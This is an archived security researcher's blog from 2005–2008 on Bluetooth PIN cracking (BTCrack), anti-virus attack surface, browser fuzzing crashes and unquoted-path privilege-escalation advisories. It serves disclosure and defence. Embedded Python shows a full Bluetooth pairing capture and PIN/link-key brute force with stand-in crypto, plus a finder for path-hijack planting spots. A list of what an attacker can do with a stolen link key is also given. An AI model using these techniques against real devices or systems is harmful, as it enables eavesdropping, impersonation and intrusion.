Thierry Zoller

Humankind cannot stand very much reality.

New Blog location

I moved to a new blogging system, which is easier to maintain, so expect more frequent updates. The new blog URL is blog.zoller.lu

This page will serve as a location to publish research results or advisories. The blog will serve as a way to publish small tidbits or links.

 

08 / 2008 Posted by Thierry | Tags:Hacking Cars| Comments?

The Death of AV Defense in Depth? Revisiting AV Software

It has been quite some time since I updated this blog; I will try to update it in the next weeks with a few details on what I was up to during the last months.

Let's start with the more important stuff: I got into AV research again =) The output of this will hit the public in the next months; be warned, there will be a flood of advisories :D


Together with Sergio Alvarez I gave a talk @ Hack.lu 2007. This year we explained what the heck is up with anti-virus software. We revisited the way AV solutions are implemented in current company networks, and AV engines themselves. Defense in Depth is being misinterpreted and incorrectly implemented, with disastrous effects. (They believe they do DiD when in reality they do not; this is an important fact to keep in mind.)

Rough break-down of the talk:

  • DiD as implemented for anti-virus software is broken: companies put one AV engine after the other, believing this to be DiD. The worst security incident in such an architecture is incorrectly defined as "a virus passes the gateway unrecognized"; in reality the worst possible failure is that the underlying operating system is compromised through the AV engine, and you have to mitigate this.
  • AV software is broken beyond recognition: it parses enormous amounts of data in unmanaged programming languages and is therefore naturally prone to errors. This was clear from the start, but the sheer amount of bugs is something else. Reality shows they all are.
  • AV software runs directly on critical infrastructure with highly privileged rights, and AV software runs everywhere.
  • E-mail changes what is at stake: what happens if I send an exploit targeting AV software as an attachment in an e-mail? (You can automatically compromise corporate mail servers/clients/gateways from the outside, as your e-mail travels through the firewalls untouched.)

You can view the presentation here; it might be interesting to you, as I don't think everybody is aware of the impact some findings may have: http://www.nruns.com/ps/The_Death_of_AV_Defense_in_Depth-Revisiting_Anti-Virus_Software.pdf

Note: n.runs tried to find a generic solution to these problems and has found a way to protect against known and unknown attacks.

 

11 / 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Planetopia TV Show - Posterboy...

This is kind of old news and I present it here for the archives: the German TV channel "SAT 1" did a documentary with me on Bluetooth security. I am not happy about the outcome; they had around 5 hours of footage, 5 minutes were used, and only the lame stuff was shown. The real stuff (MITM, cracking etc.) was not even indirectly referred to.

Sigh, anyway here it is:

For those that understand German here is the archived footage :



11 / 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

BTSniff - Bluetooth sniffing under *nix

My call for an OSS Bluetooth sniffer during the last 23C3 in Berlin did not go unanswered. First there was Max Moser ("Bluetooth - Getting raw access"), who uncovered how you can modify a consumer USB stick by flashing it with a commercial BT sniffer firmware (at least one vendor included the firmware with every trial download) and get RAW access to it.

The question that was left was how to send commands to it, get it into sniffing mode and sync it to the other devices. Exactly this is what Andrea Bittau and Dominic Spill found out during their work on a paper entitled "BlueSniff: Eve meets Alice and Bluetooth"; they further implemented it in C code. The paper will shortly be published and presented at this year's USENIX (WOOT).

In other words, a Bluetooth hacker's dream has partially come true: a cheap and (partially) open way to sniff and capture packets, including the pairing handshake, which may then be cracked.

Andrea is currently working on cracking open the very last thing that keeps him from crafting low-level Bluetooth packets, the XAP2 processor: he disassembled the firmware to find out how exactly it works, and for that he wrote his own disassembler. After this he/we may write our own firmware and basically do whatever we like, for example a full-blown fuzzer or a full-blown attack device.

Other very interesting findings will be uncovered, more on this later :)

sniffer.c
Makefile
Sync.sh

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Politics - WTF are you thinking ? My Wake-Up call

btcrack

I rarely comment on political issues within this blog; now I do. Overall in Europe, politicians seem to be jumping on the bandwagon of losing privacy rights and passing surveillance laws.

The scapegoat here is "Islamic terror"; especially in Germany it is being blamed for pretty much everything. I call bullshit.


Check the independent report "EU TERRORISM SITUATION AND TREND REPORT 2007" by nobody else than Europol.

I repeat: "Islamic terror is the number one threat to Europe" is the chanson of lots of politicians; now check this:

My question is this: how come a politician can make such claims without being held accountable, when there is clear evidence that he is simply pushing an agenda and doesn't care about reality? Not to mention that these other "terrorist" groups always existed, always were there. One thing is clear to me: if we don't get off our lame asses and start to do something, we soon will be no better than the US.

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

BTCrack 1.1 - FPGA Release :)

btcrack

BTCrack 1.1 is ready! I named it the BTCrack Heisec release because I released it during the Heisec security conference.

BTCrack is a pairing-handshake cracker against Bluetooth 1.0 - 2.0; for more information please refer to the paper "Cracking the Bluetooth PIN" by Shaked and Wool.

In cooperation with Pico Computing (http://www.picocomputing.com/) we added FPGA support to BTCrack 1.1 and increased the software speed by 15%, reaching 200,000 keys per second on a stock dual-core P4 at 2.0 GHz.

Version 1.1 :
  [+] Added priority control
  [*] Fixed splash bug
  [+] Added FPGA support
  [+] Speed increase (15%)

Speed (keys/sec)   Hardware
       200,000     Dual-core P4 2 GHz (software)
     7,600,000     E12 @ 50 MHz (Pico FPGA)
    10,000,000     E12 @ 75 MHz (Pico FPGA)
    30,000,000     E16 (Pico FPGA)

 

Download BTCrack 1.1

 

Mai 2007 Posted by Thierry | Tags:Hacking Cars| Comments?

Secure Web Applications - Alexios Fakos

sichere web applikationen

A friend and colleague of mine, namely Alexios Fakos, has published a book under the title "Sichere Web-Anwendungen" ("Secure Web Applications"); unfortunately it is German only. If you'd like to know how to code hardened applications, I heartily recommend this book.

A free chapter of the book can be found here

Mai, 2007 Posted by Thierry | Tags:Sichere Webapplikationen| Comments?

23C3 - Bluetooth Hacking revisited

firewall

Kevin Finisterre and myself gave a Bluetooth presentation at the 23C3 congress in Berlin on 29.12 at 14:00 local time. We released a bit of 0day and a bit of protocol bugs and tidbits. See for yourself :) Thanks to everybody that made this possible, and also thanks to the CCC for organising this event; while I couldn't really participate as a spectator, at least I can judge the behind-the-scenes work. I was impressed. The organisation was good and people very friendly and helpful.

 

Releases during 23C3 :

Please, for those writing about this lecture: the key findings are not the tools. You have been so spoon-fed by the last Bluetooth talks that you think what is important are tools :(

There are now underlying protocol security issues, not only pure implementation issues:

What is important to understand is that non-discoverable mode no longer represents a protection. Naturally, before attacking a device you have to know it's there; previously you could try to brute-force the address (BD_ADDR) in order to find it if it was in non-discoverable mode. This, however, is unreliable and takes a very long time.

During this talk I released information on how to PASSIVELY discover 90% of the address and brute-force the remaining 8 bits, which is reliable and fast. (The 48-bit BD_ADDR consists of NAP, UAP and LAP: the 24-bit LAP is encoded in the sync word of every packet, the 16-bit NAP is not needed to page a device, so only the 8-bit UAP has to be guessed.)

THIS means that the only protection Bluetooth had against me connecting to your device is GONE.

The paradigm shift from toys to workstations is also considerable:

  • We can eavesdrop on your laptop's microphone, we can compromise it and take control over it.
  • The random number generators, and the encryption affected by them, are weak.
  • New re-pairing attack, making the pairing attack INTERESTING.
  • Your drivers lack control, have no update function and are flawed beyond comprehension.
  • Live demo on how to take over a PC and get a remote shell over Bluetooth.

Key points from the lecture:

  • PIN and link key recovery is practically possible (code release and live demo)
  • If you use Bluetooth keyboards or mice, your PC has a HID server; this may be attached to in order to inject commands (!) as if you were typing on the keyboard
  • The random numbers used for encryption and so forth may be very weak on your device
  • The PIN is not that useful, the link key is!
  • Swap over to Bluetooth 2.1 (as soon as possible) and use "Secure Simple Pairing"
  • Regard the quality of the encryption Bluetooth offers (E0) as a PRIVACY feature, NOT a security feature (compare it to WEP)
  • New re-pairing attack: connect to the master pretending to be from the piconet, using a fake link key; the master will think "oops, lost the pairing" and re-initiate the pairing, giving an attacker the chance to capture the exchange and crack it
  • Don't trust that encryption is taking place: sometimes the devices negotiate Security Mode 2, and you don't know that your data is actually transferred in clear text (after being authenticated), and you can't check, as you don't have a Bluetooth sniffer
  • The Bluetooth PIN is actually a Bluetooth passkey; it supports characters, not only digits (this has security implications)
Things to do once you have the link key:
  • Passively decrypt the traffic
  • Connect to the slaves pretending to be the master and have full access (no PIN required)
  • Connect to the master pretending to be one of the slaves and have full access (no PIN required)
  • Plant the link key on a BT-capable machine and have a remote encrypted stealth channel to that machine

Update your drivers!
  • Widcomm, Toshiba, BlueSoleil: ALL vulnerable
  • Don't rely on Windows Update for that; your BT stack may be from a third-party vendor (very likely)
  • Listening on the microphone and recording is also possible on PCs (not only cars)

General recommendations:

  • Delete your existing pairings as soon as you don't need them
  • Pair in "secure places" (SIG recommendation)
  • As soon as your device asks for a PIN again, don't enter it; you might be snooped on (see the previously mentioned re-pairing attack)
  • Don't trust Bluetooth 1.0 - 1.2 (can't tell for 2.0 - 2.1 yet)

Companies:

  • Mitigate and monitor.

Companies using Bluetooth for industrial purposes:

  • Regenerate a new key every 5 minutes, use 16 characters.

Vendors:

  • PLEASE implement the GUI so that the Bluetooth passkey can use characters (UTF-8), NOT ONLY DIGITS.
  • Please be more transparent about your device driver version numbers and propose an easy way to update.

January 1, 2007 Posted by Thierry | Tags:Bluetooth| Comments?

BTCrack 0.9a - Pre-Final Release

firewall

BTCrack 0.9a is going ahead nicely; optimisations have been done, and the final release will be on the n.runs website, as promised, very soon™ :)

BTCrack 0.9a now spawns 8 threads in order to crack the keys, which means that dual-core or quad-core processors work out very nicely :) A few assembler optimisations are still ahead, and the final release should be ready for 23C3.

The general assumption that the attack is only theoretically possible and that PINs of 6 digits represent good protection is now practically refuted.

Here are my current stats on a dual-core P4 2 GHz (48,000 PINs per second):

PIN         Time required (seconds)
1234        0.25
12345       1.59
654321      16.171
123456789   4851.156 (1.3 hours)

 

New Video - Cracking a 6 digit Pin
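The attack BTCrack implements, and the re-pairing trick from the 23C3 post that forces a fresh exchange for the sniffer to capture, can be shown end to end in code. The Python below is an added example, not BTCrack's source: it models legacy (pre-2.1) pairing as a passive sniffer sees it (IN_RAND, the two COMB_KEY values that are LK_RAND XOR Kinit, and one AU_RAND/SRES challenge-response) and then recovers the PIN and, more usefully, the link key Kab by redoing the devices' own computation for each PIN guess and comparing the resulting SRES with the captured one. In the specification E22, E21 and E1 are built on SAFER+; here they are stand-ins built on HMAC-SHA256 with the spec's input and output shapes, which keeps the attack structure exact but says nothing about real-world speed. The BD_ADDRs, PINs and random values are constructed for the demonstration.

```python
import hashlib
import hmac
import itertools
import os
from dataclasses import dataclass


# STAND-INS: the real E22 (Kinit from PIN), E21 (per-device link-key share) and
# E1 (challenge/response, 32-bit SRES) are SAFER+-based. Keyed SHA-256 replaces
# them here with the same inputs and output sizes; this is NOT the Bluetooth spec.
def _prf(label, *parts):
    return hmac.new(label, b"".join(parts), hashlib.sha256).digest()[:16]


def E22(pin, bd_addr, in_rand):
    return _prf(b"E22", pin, bd_addr, in_rand)


def E21(lk_rand, bd_addr):
    return _prf(b"E21", lk_rand, bd_addr)


def E1(link_key, bd_addr, au_rand):
    return _prf(b"E1", link_key, bd_addr, au_rand)[:4]      # SRES is 32 bits


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Capture:
    """Everything a passive sniffer sees during legacy pairing + authentication."""
    addr_a: bytes
    addr_b: bytes
    in_rand: bytes        # sent in clear by the initiator
    comb_a: bytes         # LK_RAND_A XOR Kinit, sent in clear
    comb_b: bytes         # LK_RAND_B XOR Kinit, sent in clear
    au_rand: bytes        # A's challenge
    sres: bytes           # B's response


def pair_and_authenticate(pin, addr_a, addr_b, rng=os.urandom):
    """Both sides of the exchange. Returns what went over the air and the
    secret link key Kab the two devices now share."""
    in_rand = rng(16)
    kinit = E22(pin, addr_b, in_rand)                 # both sides derive Kinit from the PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    comb_a, comb_b = xor(lk_rand_a, kinit), xor(lk_rand_b, kinit)
    kab = xor(E21(lk_rand_a, addr_a), E21(lk_rand_b, addr_b))   # combination key
    au_rand = rng(16)
    sres = E1(kab, addr_b, au_rand)                   # B proves it holds Kab
    return Capture(addr_a, addr_b, in_rand, comb_a, comb_b, au_rand, sres), kab


def link_key_from_pin(pin, cap):
    """Offline: repeat the devices' computation with a guessed PIN."""
    kinit = E22(pin, cap.addr_b, cap.in_rand)
    lk_rand_a, lk_rand_b = xor(cap.comb_a, kinit), xor(cap.comb_b, kinit)
    return xor(E21(lk_rand_a, cap.addr_a), E21(lk_rand_b, cap.addr_b))


def crack(cap, alphabet="0123456789", max_len=6):
    """Enumerate passkeys shortest-first; a guess is right when it reproduces the
    captured SRES. Returns (pin, link_key, guesses) or (None, None, guesses).
    A wrong PIN matching a 32-bit SRES by chance is ~2^-32 per guess."""
    guesses = 0
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            pin = "".join(chars).encode()
            guesses += 1
            kab = link_key_from_pin(pin, cap)
            if E1(kab, cap.addr_b, cap.au_rand) == cap.sres:
                return pin, kab, guesses
    return None, None, guesses


if __name__ == "__main__":
    # Constructed BD_ADDRs and PIN for the demonstration.
    A, B = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    cap, real_kab = pair_and_authenticate(b"1234", A, B)
    pin, kab, n = crack(cap)
    print(pin, kab == real_kab, n)
```

Shortest PINs are tried first, as a real cracker does, so a 4-digit PIN falls after at most 1110 + 10000 guesses, and the output is the link key, which is what you need to impersonate either side or decrypt the traffic afterwards. Passing a larger alphabet to crack() (digits plus letters) is exactly what the "use characters, not only digits" recommendation buys: the keyspace per position grows from 10 to 36 or more.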

 

December 15, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

Hack.lu - 0-day stuff , nice Conference

firewall

Hack.lu is over! A nice security conference in Luxembourg. Had a great time, although sometimes the organisation was a bit messed up ;) Reeaaaallly nice and very interesting people, the commercial rate was very low, and finally I saw some people I knew only virtually in real life.

Well, as you knew or didn't know, Kevin Finisterre and myself gave a talk about Bluetooth security. Yaaaaaaaaaaawwwwwwwwwwnnnnnn?


I don't believe so:

- Live demo: remote ROOT shell over Bluetooth on Mac OS X 10.3.9 / 10.4 (and source code release)
- Live demo: presenting BTCrack, a Bluetooth PIN and link key cracker
                   Will be released on nruns.com complete with source code in a few weeks!
- Clearing the air about Inqtana (the PoC worm Kevin created)
- FUD reduced to a minimum: what's a threat, what isn't
- Download our slides from Hack.lu

See you next year !

 

August 3, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

The forgotten Security Tool - Satori

firewall

I started using this tool last year during internal tests, and it was immediately obvious to me that this is a great tool to have. Its name is Satori; if you never heard about it, that's not proof that the tool is no good, but rather that its author, Eric Kollmann, does not really seem to care whether you do (or at least doesn't scream it from every rooftop).

I found out about Satori while reading the paper "Chatter on the Wire" (by the same author), which goes to great length about passive OS fingerprinting and its potential for improvement over what several other tools do. What is interesting is that the paper was not only theoretical but practical: its outcome was Satori, a beautiful plug-in based passive enumeration and fingerprinting tool.

Satori uses WinPcap and captures packets passively at the NDIS level; every packet flying by is scrutinised for information that might determine its OS. Nothing new here, you might say; well, Satori does the fingerprinting on:
DHCP, BOOTP, ICMP, TCP, CDP, EIGRP, HPSP, HSRP, HTTP, IPX, SMB, SNMP, STP, UPNP
precisely enough to either correlate the results with nmap or to rely on them. It makes spotting potentially vulnerable systems a breeze.

It's obviously very handy for critical networks where you are not allowed to scan, or to scan only a minimum. (This does exist.)

It shows its strength when used in internal networks: I was able to spot machines that didn't belong in a certain critical network immediately (as they broadcast their NetBIOS presence) by only using passive means. It's also very useful when doing quick scans (nmap on port 80, for example) across an internal network: it gathers all packets, makes a list of all responding machines, fingerprints them and gives you an exportable list. Very handy, and speedy: I was able to pump 8000 packets per second through without any lag or problems.

Nice tool to have in your toolbox. Send its author your support :)
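Passive DHCP fingerprinting of the kind Satori's DHCP plug-in does works from what a client volunteers in its DHCPDISCOVER: chiefly the order of option codes in the parameter request list (option 55) and the vendor class identifier (option 60). The Python below is an added illustration of that technique, not Satori's code and not its signature database: it parses the BOOTP header and option area of a DHCP message, extracts the client MAC, and matches the request list and vendor class against a two-entry signature table constructed for this example (both rows are illustrative; a real database has hundreds). build_discover(), fingerprint() and SIGNATURES are names of this example, and the packet it builds is constructed, not captured.

```python
import struct

# Constructed signature table for this example; NOT Satori's database.
# Key: (vendor class from option 60, parameter request list from option 55).
SIGNATURES = {
    ("MSFT 5.0", (1, 15, 3, 6, 44, 46, 47, 31, 33, 249, 43)): "Windows XP",
    ("", (1, 28, 2, 3, 15, 6, 119, 12, 44, 47, 26, 121, 42)): "Linux (dhclient-style)",
}

BOOTP_HDR = struct.Struct("!BBBBIHHIIII16s64s128s")   # 236-byte fixed header (RFC 951)
MAGIC_COOKIE = b"\x63\x82\x53\x63"                    # marks DHCP options (RFC 2132)


def parse_options(blob):
    """TLV walk over the option area that follows the magic cookie."""
    opts, i = {}, 0
    while i < len(blob):
        code = blob[i]
        if code == 0:            # PAD: single byte, no length field
            i += 1
            continue
        if code == 255:          # END
            break
        length = blob[i + 1]
        opts[code] = blob[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def parse_dhcp(packet):
    """Return (client MAC, options dict) for a DHCP message (UDP payload)."""
    end = BOOTP_HDR.size
    if len(packet) < end + 4 or packet[end:end + 4] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    fields = BOOTP_HDR.unpack_from(packet)
    hlen, chaddr = fields[2], fields[11]              # hardware address length, chaddr
    mac = ":".join("%02x" % b for b in chaddr[:hlen])
    return mac, parse_options(packet[end + 4:])


def fingerprint(packet):
    """Passive guess from what the client asked for (option 55, in the order
    sent) and what it calls itself (option 60). Nothing is transmitted."""
    mac, opts = parse_dhcp(packet)
    prl = tuple(opts.get(55, b""))
    vendor = opts.get(60, b"").decode("ascii", "replace")
    return mac, SIGNATURES.get((vendor, prl), "unknown")


def build_discover(mac, vendor, prl):
    """Constructed DHCPDISCOVER for testing; layout follows RFC 2131/2132."""
    chaddr = bytes.fromhex(mac.replace(":", "")).ljust(16, b"\x00")
    hdr = BOOTP_HDR.pack(1, 1, 6, 0, 0x3903F326, 0, 0x8000, 0, 0, 0, 0, chaddr, b"", b"")
    opts = bytes([53, 1, 1])                                        # message type: DISCOVER
    if vendor:
        opts += bytes([60, len(vendor)]) + vendor.encode("ascii")   # vendor class identifier
    opts += bytes([55, len(prl)]) + bytes(prl) + b"\xff"            # parameter request list, END
    return hdr + MAGIC_COOKIE + opts


if __name__ == "__main__":
    pkt = build_discover("00:11:22:33:44:55", "MSFT 5.0",
                         (1, 15, 3, 6, 44, 46, 47, 31, 33, 249, 43))
    print(fingerprint(pkt))
```

In a live setup the packet bytes would come from a capture filter on UDP port 67/68 instead of build_discover(); a host that never sends DHCP (static address) simply does not show up here, which is why Satori combines several protocols rather than relying on one.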

August 3, 2006 Posted by Thierry | Tags:Hacking Cars| Comments?

XAMPP - Multiple Privilege Escalation and Rogue Autostart

firewall

Introduction :
XAMPP is an easy-to-install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and use: just download, extract and start.
In the FAQ we read: XAMPP is not meant for production use but only for developers in a development environment. However, I have seen it being used in production environments quite a lot, hence this advisory. According to the download stats, XAMPP was downloaded 2,765,443 times between 2003 and 2006.

Title : XAMPP - Multiple Privilege Escalation and Rogue Autostart
Ref  : TZO-062006-Xamp

[1] Privilege escalation to SYSTEM due to FileZilla service path specification - CVSS rating: 4
[2] Privilege escalation to SYSTEM due to MySQLadmin path specification - CVSS rating: 4
[3] Privilege escalation to SYSTEM due to CGI path specification - CVSS rating: 4
[4] Rogue autostart due to insecure file execution - CVSS rating: 2.8

 

Read more

May 21, 2006 Posted by Thierry | Tags:Research and Development| Comments?

Bluetooh + GPS + 360° Camera = Bluetooth Wardriving machine

Kevin Finisterre has done some great things lately: he combined a Bluetooth setup (14 dB Yagi) with a GPS mouse and a 360° camera to form a Bluetooth wardriving set.

Whenever it spots a Bluetooth device it takes a 360° snapshot and writes the date, position and BT address into the image file.

Image1 - Image2 - Image3

April 6, 2006 Posted by Thierry | Tags:Research and Development| Comments?

CSS-Die! - A few interesting Results

firewall
HD Moore released a new fuzzer to the public; it's called CSS-Die and, as the name implies, it fuzzes most browsers to death using only CSS tags. I helped a bit on that project and HD credited me for it (thanks!). Thanks to Eric Sesterhenn for helping me out on the asm part.

Here are a few interesting results I obtained :

Internet Explorer 6 (latest version, all patches applied)

blink.style.mozboxorient 16385

EAX 00740068
ECX B99600B5
EDX B99600B6
EBX 00140000
ESP 0012CE50
EBP 00140A18
ESI 00140A18
EDI 00000013
EIP 7C912F17 ntdll.7C912F17

MOV EBX,DWORD PTR DS:[EAX]

(Note the value in EAX: 0x00740068 is the UTF-16LE encoding of the characters "ht", so the faulting instruction dereferences what looks like string data rather than a null pointer. That is what sets this crash apart from the Opera null dereferences below and makes it worth a closer look.)


Opera (latest version) :

Lots of Null Pointers (Denial of Service)

margintop

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00C01CF0
EDI 00C01CF0
EIP 67B3DF80 Opera_1.67B3DF80

67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]

marginright

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00FFB638
EDI 00FFB638

EIP 67B3DF80 Opera_1.67B3DF80


67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]

marginleft

EAX 00000000
ECX FFFFFFFF
EDX 00000000
EBX 00000000
ESP 0012F374
EBP 0012F3A4
ESI 00E94ED8
EDI 00E94ED8
EIP 67B3DF80 Opera_1.67B3DF80


67B3DF80 8B43 04 MOV EAX,DWORD PTR DS:[EBX+4]


April, 15 2006 Posted by Thierry | Tags:Funny| Comments?

Trusted Computing - Who do YOU trust ?

firewall
Here is an interesting video about Trusted Computing I came across. It makes its point without falling for FUD.

March 9, 2006 Posted by Thierry | Tags:Funny| Comments?

Windows Kernel - ASAP

firewall
Here is a job offer I came across on Monster; they don't seem to know what exactly they are searching for, but who cares? Send your CV ASAP.

March 9, 2006 Posted by Thierry | Tags:Funny| Comments?

Silent Firefox Adware Install - Proof of concept

firewall
Introduction :
Firefox has long been considered spyware-hardened and spyware-safe; it never really was. Don't get me wrong on this, it's not the fault of Firefox (although it could be a bit better protected against this particular attack). I made a small movie demonstrating this particular proof of concept.

Update: A bit of clarification of what this fuss is all about: as you see in the small animation, the extension installs without any user interaction. That should be quite new; Firefox tries to block silent installs through random profile directory names and various other tricks. The adbar sends any URL you visit to a Google syndication server, thus monitoring your surfing behaviour.

Update: The animation takes some time to load, wait for it.

Details :

Click on the image above.

March 9, 2006 Posted by Thierry | Tags:Research and Development| Comments?

Safe'nsec HIPS & Anti-Spyware- Priviledge Escalation

firewall
Introduction :
"Safe'n'Sec is complex data and user applications protection against threats and vulnerabilities for individual PC as well as workstations in corporate networks. The program uses proactive technology based on activity analysis in user PC. "



Details :
Multiple Insecure File execution and Autostart handling

During startup, snsmcon.exe spawns the GUI process named safensec.exe through CreateProcess(). In doing so it omits to set the parameter lpApplicationName and further omits to quote the path in the parameter lpCommandLine, so a path containing spaces is ambiguous and Windows may resolve it to a different executable than intended.

During autostart, Safe'n'Sec omits the quotes around the path to the executable and as such may spawn a rogue application instead of the appropriate StarForce application.

The vendor (StarForce) did not care to respond to my report, thus I decided to publish this low-impact vulnerability.
Update: StarForce quickly fixed the issues after the disclosure. (See "Read more".)

Read more

February 19, 2006 Posted by Thierry | Tags:Research and Development| Comments?

F-Secure AV - Anti-virus Bypass and Buffer Overflow - Update

firewall
Introduction :
Flaws in the way F-Secure software handles ZIP and RAR data compression archives could allow an attacker to execute remote code on users' systems and also to bypass F-Secure's antivirus-scanning capabilities.

 

Details :
I found multiple vulnerabilities within various AV engines; F-Secure is the first to actually publish a real advisory, others fixed the bugs silently or put a small notice in a changelog. I will, however, not publish more details about the findings as of yet: there are too many AV engines vulnerable to similar issues, and I am going to wait until most of them have patched the flaws before I disclose my findings exactly.
http://www.f-secure.com/security/fsc-2006-1.shtml

Rain Forest Puppy once defined a "Responsible Disclosure Practice", I adhere to it.

[Update]
The story has been posted on SecurityFocus, News.com, Washington Post, Heise, Süddeutsche, ZDNet, Computerworld and various others. Special thanks to Mikko for giving me credit.

 

January 19, 2006 Posted by Thierry | Tags:Research and Development| Comments?

CheckPoint VPN-1 SecureClient - CheckQuotes

Checkpoint
Introduction :
As employees become more mobile, sophisticated VPN solutions are required to meet key security challenges such as securing access to corporate resources and protecting remote desktops. To meet the VPN client needs of any organization, Check Point offers VPN-1 SecureClient.

Details :
During startup, the SR_Watchdog spawns the GUI process named SR_GUI.exe through CreateProcess(). In doing so it omits to set the parameter lpApplicationName and further omits to quote the path in the parameter lpCommandLine, so a path containing spaces is ambiguous and Windows may resolve it to a different executable than intended.

I decided this is not worth reporting to the vendor; it is low impact, although it shows quite bad coding practice.

Read more

 

January 16, 2006 Posted by Thierry | Tags:Research and Development| Comments?

When you trust WehnTrust - Priviledge Escalation

Wehntrust
Introduction : WehnTrust is a Host-based Intrusion Prevention System (HIPS) that provides secure buffer overflow exploitation countermeasures. While other Windows based intrusion prevention systems are only capable of working with a pre-defined group of applications, WehnTrust's technology allows it to work with virtually all software products. Perhaps best of all, WehnTrust is currently free for home use.

Details :
WehnTrust forgets to correctly quote its autostart key and thus may start c:\program.bat|exe|com on reboot...

Read More
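The WehnTrust, CheckPoint VPN-1 SecureClient, Safe'n'Sec and XAMPP entries above are all instances of the same mistake: an executable path containing spaces handed unquoted to CreateProcess() with lpApplicationName set to NULL, or written unquoted into a service or autostart key, which goes through the same resolution. The Python below is an added example, not code from any of these vendors or from the advisories. createprocess_candidates() applies the rule CreateProcess documents for an unquoted command line (cut at every space; a fragment without an extension gets ".exe" appended), hijack_points() lists the candidates tried before the intended binary whose directory a given principal can write to, and unquoted_service_paths() audits the service registry for the pattern on Windows (it returns an empty list elsewhere). The path, the ACL table and the -autostart argument are constructed for the demonstration.

```python
import ntpath
import os


def createprocess_candidates(command_line):
    """Executables Windows tries, in order, for CreateProcess(lpApplicationName=NULL,
    lpCommandLine=command_line). A quoted line has one meaning; an unquoted one is
    cut at each space, and a fragment with no extension gets '.exe' appended."""
    if command_line.startswith('"'):
        return [command_line[1:command_line.index('"', 1)]]
    parts = command_line.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        fragment = " ".join(parts[:i])
        if not ntpath.splitext(fragment)[1]:
            fragment += ".exe"
        candidates.append(fragment)
    return candidates


def is_ambiguous(command_line):
    """True when the path up to the executable name contains a space and is unquoted."""
    if command_line.startswith('"'):
        return False
    return " " in command_line.lower().split(".exe", 1)[0]


def quote_command_line(exe, *args):
    """The fix on the caller's side: quote the image path (or set lpApplicationName)."""
    return " ".join(['"%s"' % exe] + list(args))


def hijack_points(command_line, intended_exe, dir_is_writable):
    """Candidates tried BEFORE the intended binary whose directory the attacker can
    write to. A file planted there runs instead of the real one, with the
    privileges of whoever launches it (SYSTEM for a service, the user for autostart)."""
    spots = []
    for cand in createprocess_candidates(command_line):
        if ntpath.normcase(cand) == ntpath.normcase(intended_exe):
            break
        if dir_is_writable(ntpath.dirname(cand)):
            spots.append(cand)
    return spots


def unquoted_service_paths():
    """Windows only: services whose ImagePath is resolved the ambiguous way."""
    if os.name != "nt":
        return []
    import winreg
    found = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as svcs:
        for i in range(winreg.QueryInfoKey(svcs)[0]):
            name = winreg.EnumKey(svcs, i)
            try:
                with winreg.OpenKey(svcs, name) as key:
                    path = winreg.QueryValueEx(key, "ImagePath")[0]
            except OSError:
                continue
            if isinstance(path, str) and is_ambiguous(path):
                found.append((name, path))
    return found


if __name__ == "__main__":
    # Constructed service command line and a constructed ACL view: the vendor's
    # directory under Program Files was left writable, the drive root was not.
    EXE = r"C:\Program Files\Vendor Tool\agent.exe"
    CMD = EXE + " -autostart"
    WRITABLE = {"C:\\": False, r"C:\Program Files": True}
    print(createprocess_candidates(CMD))
    print(hijack_points(CMD, EXE, lambda d: WRITABLE.get(d, False)))
    print(createprocess_candidates(quote_command_line(EXE, "-autostart")))
    print(unquoted_service_paths())
```

With the constructed ACL the vulnerable line yields C:\Program Files\Vendor.exe as a planting spot; the quoted form yields a single candidate and no planting spot at all, which is the whole fix. Note that writable C:\ or C:\Program Files is the attacker's precondition, so the same unquoted path is only a privilege escalation where the directory ACLs are loose.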

January 16, 2006 Posted by Thierry | Tags:Research and Development| Comments?

WMF Vulnerability PATCH -

Here is a patch against the WMF vulnerability from IDA Pro coder Ilfak Guilfanov:
http://handlers.sans.org/tliston/wmffix_hexblog14.exe

Apply it now and uninstall it when MS provides a patch.

Updated the link, thanks Tomas Vanhoof.

January 03, 2006 Posted by Thierry | Tags:Research and Development| Comments?

New AV-Evasion Methods - Summary

firewall
My current research results:

New methods of evasion: 5
AV products currently affected: 22* (counting)
Gateway solutions affected: 2* (counting)

Only taking into account vendor-confirmed vulnerabilities.

I won't disclose which products are affected by which "vulnerability" until the vendor has patched the software and given me clearance to go ahead.

It's amazing how differently AV vendors react to such reports: some, like Fortinet, respond very quickly, disclose all the vulnerable versions and have a patch ready in merely days; others give you a single point of contact, act very professionally and give you weekly updates; yet others say they have no time, or consider your research "doubtful" or question the "methodology" (without fixing the actual bugs).

I will include these reactions as comments, as neutrally as humanly possible, in my future advisories.

* The number depends on the cooperation of the vendor in disclosing all vulnerable versions.

December 28, 2005 Posted by Thierry | Tags:Research and Development| Comments?

ICMP Types - Ban them all!

No, please don't. I have seen tons of recommendations to filter all ICMP traffic; I have seen people feeling all warm and fuzzy inside because they blocked all those nasty ICMP datagrams, some having severe network congestion problems _because_ they filter every ICMP packet.

Well, here is news for you: ICMP is there to help you.

Types to consider not filtering:
- ICMP type 3 code 4: fragmentation needed but DF bit set (outgoing). Why? Path MTU discovery: without it, connections that cross a smaller MTU somewhere on the path stall or crawl, which is the congestion problem mentioned above. (Your own hosts need to receive it as well, so in practice it matters in both directions.)
- ICMP type 11: time exceeded (incoming). Why? Traceroute, and also important when routing loops occur. Block it outgoing (firewalking).

